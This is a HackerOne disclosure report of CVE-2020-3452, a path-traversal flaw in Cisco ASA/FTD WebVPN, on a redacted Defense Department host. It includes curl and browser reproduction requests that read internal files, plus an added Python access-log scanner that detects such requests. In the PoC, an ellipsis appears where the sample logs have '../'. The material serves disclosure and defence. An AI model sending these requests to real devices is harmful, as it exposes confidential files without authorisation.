HackerOne H1:959187 (secret_letters)
History: Aug 15, 2020 - 2:08 a.m.

U.S. Dept Of Defense: ███ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability


CVSS3: 7.5 High
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: NONE
  Availability Impact: NONE

CVSS2: 5 Medium
  Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: NONE
  Availability Impact: NONE

EPSS: 0.975 High
  Percentile: 100.0%

Summary:
████████ is vulnerable to Read-Only Path Traversal Vulnerability as described at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

Description:
GET request parameters at the /+CSCOT+/translation-table and /+CSCOT+/oem-customization endpoints are not properly sanitized, which allows reading files within the web root directory that are not intended to be readable.

According to Cisco:
The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device.

Step-by-step Reproduction Instructions

In Browser:

  1. Copy and paste into your browser: ███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=…/
  2. Note the file offered for download: it is the source code of portal_inc.lua, which is not normally accessible.

In curl:

  1. curl -k "████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=…/" to prove you can read internal files such as /+CSCOE+/portal_inc.lua.
  2. Various internal files can be read; some require the --output option to write the response to a file, as shown in step 3.
  3. curl -k "█████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/http_auth.html&default-language&lang=…/" --output session.js

Product, Version, and Configuration (If applicable)

AnyConnect SSL VPN - webvpn
Clientless SSL VPN - webvpn

Suggested Mitigation/Remediation Actions

Update the software to the latest version via the Cisco advisory linked above in the Summary.
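Until that update is applied, the request shape described in the Description and reproduced above is easy to pick out of the access logs of the web server or proxy in front of the VPN endpoint. The following Python is an added example, not part of this report or of Cisco's advisory. It parses constructed access-log lines in a combined-log-style format (an assumption; adapt the regex to your own logs), percent-decodes the query string repeatedly so single- and double-encoded traversal sequences normalise to the same thing, and flags requests to the two endpoints named in the report whose parameters contain a ".." path segment or, as in the report's PoC, a textdomain pointing into the internal /+CSCOE+/ tree. The parameter names lang and textdomain are taken from the report; the sample log lines, client addresses and benign requests are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints named in the report (assumed here to be the only two worth watching).
TARGET_PATHS = ("/+CSCOT+/translation-table", "/+CSCOT+/oem-customization")

# Combined-log-style access line; an assumed format, adjust the pattern to your own logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A ".." path segment; backslashes are normalised to "/" before this is applied.
DOTDOT_SEGMENT = re.compile(r"(?:^|/)\.\.(?:/|$)")


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable, so %2e%2e and %252e%252e both end up as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(value):
    """True if the (decoded) value contains a '..' path segment."""
    return DOTDOT_SEGMENT.search(decode_fully(value).replace("\\", "/")) is not None


def classify_request(target):
    """Return a short reason if the request target matches the CVE-2020-3452 pattern, else None."""
    parts = urlsplit(target)
    path = decode_fully(parts.path)
    if not any(path.startswith(p) for p in TARGET_PATHS):
        return None
    # parse_qs decodes each value once; decode_fully handles any further layers.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, values in params.items():
        if any(has_traversal(v) for v in values):
            return f"traversal sequence in '{name}'"
    # The report's PoC points textdomain at the internal /+CSCOE+/ tree; treat that as a hit too.
    if any("/+CSCOE+/" in decode_fully(v) for v in params.get("textdomain", [])):
        return "textdomain references internal /+CSCOE+/ file"
    return None


def scan_access_log(lines):
    """Return (client_ip, request_target, reason) for every line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand; skip rather than crash
        reason = classify_request(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("target"), reason))
    return hits


# Constructed sample lines (not from the report). The first three mirror the request
# shape in the report: plain, double-encoded, and with only textdomain pointing at an
# internal file. The last two are benign WebVPN traffic and must not be flagged.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Aug/2020:02:08:55 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4121',
    '192.0.2.11 - - [15/Aug/2020:02:09:10 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=%252f%252bCSCOE%252b%252fhttp_auth.html&default-language&lang=%252e%252e%252f HTTP/1.1" 200 2210',
    '192.0.2.12 - - [15/Aug/2020:02:09:40 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=en HTTP/1.1" 404 310',
    '198.51.100.5 - - [15/Aug/2020:02:10:02 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=AnyConnect&default-language&lang=en HTTP/1.1" 200 9870',
    '198.51.100.6 - - [15/Aug/2020:02:10:30 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, target, reason in scan_access_log(SAMPLE_LOG):
        print(f"{ip}  {reason}  {target}")
```

Matching is by path prefix, so probes against /+CSCOT+/oem-customization are caught as well even though the report gives no full request for that endpoint. One caveat: parse_qs turns an unencoded literal "+" in a query value into a space, so the textdomain heuristic only fires when the "+" is percent-encoded as in the report's requests; the traversal check is unaffected.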

Impact

An attacker can view arbitrary files within the web services file system on the targeted device that are meant to be internal or confidential. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features.
CVSS Score: Base 7.5
Vector: https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
